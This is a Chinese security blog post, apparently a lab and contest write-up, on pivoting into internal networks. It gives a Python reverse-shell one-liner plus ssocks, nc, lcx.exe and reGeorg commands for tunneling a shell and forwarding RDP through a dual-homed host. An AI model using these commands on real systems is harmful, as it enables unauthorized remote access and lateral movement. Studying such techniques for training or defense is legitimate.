<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="内网渗透," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="整理整理最近碰到关于内网穿透（渗透）的一些基础知识 内网渗透随想  上图是我自己布置模拟环境，可以从拓扑上清晰地看出内网的ip段是192.168.1.0/24，模拟的外段是192.168.80.0/24，现在我要把内网Ubuntu的机子的shell反弹到外网Kali 上，现在需要Centos7做中转。我在Centos上做端口转发 cd /src./rcsocks -l 1088 -p 1080 -">
<meta name="keywords" content="内网渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="内网穿透随想">
<meta property="og:url" content="http://whc.dropsec.xyz/2017/12/12/内网穿透随想/index.html">
<meta property="og:site_name" content="Ha1g0的窝">
<meta property="og:description" content="整理整理最近碰到关于内网穿透（渗透）的一些基础知识 内网渗透随想  上图是我自己布置模拟环境，可以从拓扑上清晰地看出内网的ip段是192.168.1.0/24，模拟的外段是192.168.80.0/24，现在我要把内网Ubuntu的机子的shell反弹到外网Kali 上，现在需要Centos7做中转。我在Centos上做端口转发 cd /src./rcsocks -l 1088 -p 1080 -">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://oohnuejim.bkt.clouddn.com/%E6%A8%A1%E6%8B%9F.png">
<meta property="og:image" content="http://oohnuejim.bkt.clouddn.com/%E8%A5%BF%E6%99%AE%E5%B8%82%E8%B5%9B.png">
<meta property="og:image" content="http://oohnuejim.bkt.clouddn.com/reGeorg.png">
<meta property="og:image" content="http://oohnuejim.bkt.clouddn.com/%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2.png">
<meta property="og:updated_time" content="2017-12-12T10:48:57.008Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网穿透随想">
<meta name="twitter:description" content="整理整理最近碰到关于内网穿透（渗透）的一些基础知识 内网渗透随想  上图是我自己布置模拟环境，可以从拓扑上清晰地看出内网的ip段是192.168.1.0/24，模拟的外段是192.168.80.0/24，现在我要把内网Ubuntu的机子的shell反弹到外网Kali 上，现在需要Centos7做中转。我在Centos上做端口转发 cd /src./rcsocks -l 1088 -p 1080 -">
<meta name="twitter:image" content="http://oohnuejim.bkt.clouddn.com/%E6%A8%A1%E6%8B%9F.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://whc.dropsec.xyz/2017/12/12/内网穿透随想/"/>





  <title> 内网穿透随想 | Ha1g0的窝 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>
    <a href="https://github.com/whcjst"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/a6677b08c955af8400f44c6298f40e7d19cc5b2d/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f677261795f3664366436642e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png"></a>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ha1g0的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://whc.dropsec.xyz/2017/12/12/内网穿透随想/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ha1g0">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://i2.muimg.com/567571/93e407bf4ec3ebb7.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ha1g0的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                内网穿透随想
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-12-12T15:56:57+08:00">
                2017-12-12
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透/" itemprop="url" rel="index">
                    <span itemprop="name">渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>整理整理最近碰到关于内网穿透（渗透）的一些基础知识</p>
<h3 id="内网渗透随想"><a href="#内网渗透随想" class="headerlink" title="内网渗透随想"></a>内网渗透随想</h3><hr>
<p><img src="http://oohnuejim.bkt.clouddn.com/%E6%A8%A1%E6%8B%9F.png" alt="模拟"></p>
<p>上图是我自己布置模拟环境，可以从拓扑上清晰地看出内网的ip段是192.168.1.0/24，模拟的外<br>段是192.168.80.0/24，现在我要把内网Ubuntu的机子的shell反弹到外网Kali</p>
<p>上，现在需要Centos7做中转。<br>我在Centos上做端口转发</p>
<p><code>cd /src</code><br><code>./rcsocks -l 1088 -p 1080 -vv</code></p>
<p>现在我将Ubuntu上执行Python的反弹shell（反弹shell命令很多，请自行搜索），</p>
<a id="more"></a>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.1.1&quot;,1089));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;</div></pre></td></tr></table></figure>
<p>然后kali正向连接Centos就行了</p>
<p><code>nc 192.168.80.129 1080</code><br>或者<br><code>./rssocks -vv -s 192.168.80.129:1080</code></p>
<p><img src="http://oohnuejim.bkt.clouddn.com/%E8%A5%BF%E6%99%AE%E5%B8%82%E8%B5%9B.png" alt="西普市赛"></p>
<p>这个环境是我上次市赛碰到的环境，当时没有在ssocks本地编译，所以用了另一个代理工具reGeorg<br>附上链接<a href="https://bbs.ichunqiu.com/thread-12514-1-1.html" target="_blank" rel="external">https://bbs.ichunqiu.com/thread-12514-1-1.html</a><br>用法跟ssocks有点区别，<br><img src="http://oohnuejim.bkt.clouddn.com/reGeorg.png" alt="reGeorg"><br>这个需要在双网卡服务器的web服务上放置一个tunnel脚本，比如php的就放置tunnel.nosocket.php，然后在本机执行正向连接到tunnel脚本的命令</p>
<p>python reGeorgSocksProxy.py -u (上传reGeorg脚本的地址) -p (转发端口)</p>
<h3 id="端口转发工具"><a href="#端口转发工具" class="headerlink" title="端口转发工具"></a>端口转发工具</h3><hr>
<p>再来简单地介绍介绍几个端口转发工具<br>适合自己的才是最好的</p>
<ul>
<li>lcx.exe （最容易被杀软干）</li>
</ul>
<p>反弹shell<br>攻击机<br><code>lcx.exe -listen 51 33891 把51的流量转发到33891上</code></p>
<p>代理服务器（靶机）  </p>
<p><code>lcx.exe -slave 192.168.1.100 51 192.168.80.139 3389</code><br>把本机3389转发到攻击机的51端口上</p>
<p>攻击机只需远程桌面连接 127.0.0.1:33891就能连接到靶机的3389了</p>
<p><img src="http://oohnuejim.bkt.clouddn.com/%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2.png" alt="远程桌面"></p>
<ul>
<li>Reduh、reGeorg、Tunna</li>
</ul>
<p>用法都差不多，大同小异<br>具体看<br><a href="https://bbs.ichunqiu.com/thread-12514-1-1.html" target="_blank" rel="external">https://bbs.ichunqiu.com/thread-12514-1-1.html</a><br><a href="https://mp.weixin.qq.com/s/EWL9-AUB_bTf7pU4S4A2zg" target="_blank" rel="external">https://mp.weixin.qq.com/s/EWL9-AUB_bTf7pU4S4A2zg</a></p>
<p>具体介绍一个reGeorg，比如说PHP的环境，就把tunnel.nosocket.php放在一个web目录下，然后<br>python reGeorgSocksProxy.py -u (上传reGeorg脚本的地址) -p (转发端口)</p>
<p>windows 用proxifier对转发端口进行全局代理<br>linux 用proxychain</p>
<ul>
<li>ssocks</li>
</ul>
<p>这个工具在linux用的比较多<br>一些基础用法 在上面的演示中也讲到了，具体看<br><a href="http://www.freebuf.com/articles/system/12182.html" target="_blank" rel="external">http://www.freebuf.com/articles/system/12182.html</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

	<div>
  
    
<div style="text-align:center;color: #ccc;font-size:14px;">
------ 本文结束 ------</div>
<br/>
<div style="border: 1px solid black">
<div style="margin-left:10px">
<span style="font-weight:blod">版权声明</span>
<img src="http://7xqmjb.com1.z0.glb.clouddn.com/2017020242973cc.png" >
<br/>
<p style="font-size: 10px;line-height: 30px"><a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a> by <a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo</a> is licensed under a <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" style="color:#258FC6">Creative Commons BY-NC-ND 4.0 International License</a>.<br/>
由<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo</a>创作并维护的<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a>博客采用<a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" style="color:#258FC6">创作共用保留署名-非商业-禁止演绎4.0国际许可证</a>。<br/>
本文首发于<a href="http://whc.dropsec.xyz" style="color:#258FC6">Haigo的窝</a> 博客（ <a href="http://whc.dropsec.xyz" style="color:#258FC6">http://whc.dropsec.xyz</a> ），版权所有，侵权必究。</p>
</div>
</div>

  
</div>
	
	
    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/内网渗透/" rel="tag"><i class="fa fa-tag"></i> 内网渗透</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/12/01/SQL注入进阶思考/" rel="next" title="SQL注入进阶">
                <i class="fa fa-chevron-left"></i> SQL注入进阶
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://i2.muimg.com/567571/93e407bf4ec3ebb7.jpg"
               alt="Ha1g0" />
          <p class="site-author-name" itemprop="name">Ha1g0</p>
           
              <p class="site-description motion-element" itemprop="description">最近博客重新搭建了，顺便清空了一些以前看起来有些zz的文章</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/whcjst" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xq.dropsec.xyz/" title="Mr_white" target="_blank">Mr_white</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yaocl.cn/" title="Mr_Yao" target="_blank">Mr_Yao</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://w3dr.github.io/" title="w3dr" target="_blank">w3dr</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.minitry.cn/" title="minitry" target="_blank">minitry</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#内网渗透随想"><span class="nav-number">1.</span> <span class="nav-text">内网渗透随想</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#端口转发工具"><span class="nav-number">2.</span> <span class="nav-text">端口转发工具</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ha1g0</span>
</div>
<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</div>



<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>


<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>





        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  







  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  

  

  

  



</body>
</html>
